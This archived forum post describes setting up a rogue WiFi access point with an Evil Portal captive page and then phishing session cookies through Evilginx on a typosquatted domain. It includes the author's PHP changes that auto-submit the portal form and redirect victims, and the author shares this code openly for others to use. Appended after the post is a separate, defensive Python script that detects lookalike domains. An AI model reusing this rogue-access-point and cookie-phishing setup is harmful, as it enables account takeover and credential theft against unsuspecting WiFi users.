Street
Posted April 27, 2021

I created a custom Evil Portal landing page for the WiFi Pineapple. On joining the rogue access point, Evil Portal opens up a Captive Portal. This is what normally is used by WiFi networks to register users before letting them onto the internet. You can phish for credentials this way, usually with the Pineapple. However, I wanted to do something different. I wanted to send the users to another site after they register.

By adding a line of JavaScript to the body tag in the evil portal index.html page, the JavaScript automatically triggered the form button on the page. Then I changed the code which refreshed the evil portal page after the form button was triggered to load the page I wanted.

Finally I installed Evilginx on the new server. Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. Its core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server.

Once that was up & running I squatted on another domain name, replacing one letter of the name with a dash. It was something like www.mydom-in.com. The website stole the cookies and allowed me to hack my own account. However, my domain name was seized by the courts recently, even though I never hacked anyone but myself. I have been keeping all of this & my code secret but don't want my adventure to be lost. So here you go guys!
I changed this in index.php:

```php
<BODY onload="document.forms['member_signup'].submit()">
<div style="text-align: center;">
    <h1>Connecting to WiFi.</h1>
    <p>The SSID you are connected to is <?=getClientSSID($_SERVER['REMOTE_ADDR']);?></p>
    <p>Your host name is <?=getClientHostName($_SERVER['REMOTE_ADDR']);?></p>
    <p>Your MAC Address is <?=getClientMac($_SERVER['REMOTE_ADDR']);?></p>
    <p>Your internal IP address is <?=$_SERVER['REMOTE_ADDR'];?></p>
    <form method="POST" action="/captiveportal/index.php" name="member_signup">
        <input type="hidden" name="target" value="<?=$destination?>">
        <button type="submit">Authorize</button>
    </form>
</div>
</BODY>
```

Change this in /www/captiveportal/Portal.php:

```php
    /**
     * Where to redirect to on successful authorization.
     */
    protected function redirect()
    {
        header('Location: https://www.google.com');
    }

    /**
     * Override this to do something when the client is successfully authorized.
     * By default it just notifies the Web UI.
     */
    protected function onSuccess()
    {
        header('Location: https://www.google.com');
    }
```
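A defender-side check for the lookalike-domain trick described in the post above (one letter of the name replaced with a dash), as an added example that is not part of the original post: it flags hostnames taken from DNS or proxy logs that are exactly one character edit away from a protected domain, which covers the dash substitution and generalizes it to single insertions and deletions. The protected name `mydomain.com`, the function names and the sample hostnames are assumptions constructed for illustration.

```python
# Added example: flag hostnames that are one edit away from a protected domain.
# PROTECTED and the sample hostnames below are constructed, not from the post.
PROTECTED = ["mydomain.com"]  # assumed legitimate domain(s) to watch over


def normalize(host):
    """Lowercase, drop a trailing dot and a leading 'www.' label."""
    host = host.strip().lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def one_edit(a, b):
    """Return 'substitution', 'insertion' or 'deletion' if b is exactly one
    edit away from a, else None. Linear time, no full edit-distance table."""
    if a == b or abs(len(a) - len(b)) > 1:
        return None
    # Skip the common prefix, then compare what remains after one edit.
    i = 0
    while i < min(len(a), len(b)) and a[i] == b[i]:
        i += 1
    if len(a) == len(b):
        return "substitution" if a[i + 1:] == b[i + 1:] else None
    if len(b) > len(a):
        return "insertion" if a[i:] == b[i + 1:] else None
    return "deletion" if a[i + 1:] == b[i:] else None


def check_host(host, protected=PROTECTED):
    """Return (protected_domain, edit_kind, detail) for a lookalike, or None."""
    name = normalize(host)
    for good in protected:
        kind = one_edit(good, name)
        if kind == "substitution":
            pos = next(k for k, (x, y) in enumerate(zip(good, name)) if x != y)
            return good, kind, f"{good[pos]!r} -> {name[pos]!r} at index {pos}"
        if kind:
            return good, kind, ""
    return None


def scan(hosts, protected=PROTECTED):
    """Map each suspicious hostname to its finding; exact matches are skipped."""
    return {h: r for h in hosts if (r := check_host(h, protected))}


if __name__ == "__main__":
    sample = ["www.mydomain.com", "www.mydom-in.com", "mydomian.com",
              "mydomainn.com", "example.org"]  # constructed log hostnames
    for host, finding in scan(sample).items():
        print(host, finding)
```

The comparison is on the full hostname after stripping `www.`, so a lookalike served under another subdomain would need the registrable domain extracted first.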
Archived
This topic is now archived and is closed to further replies.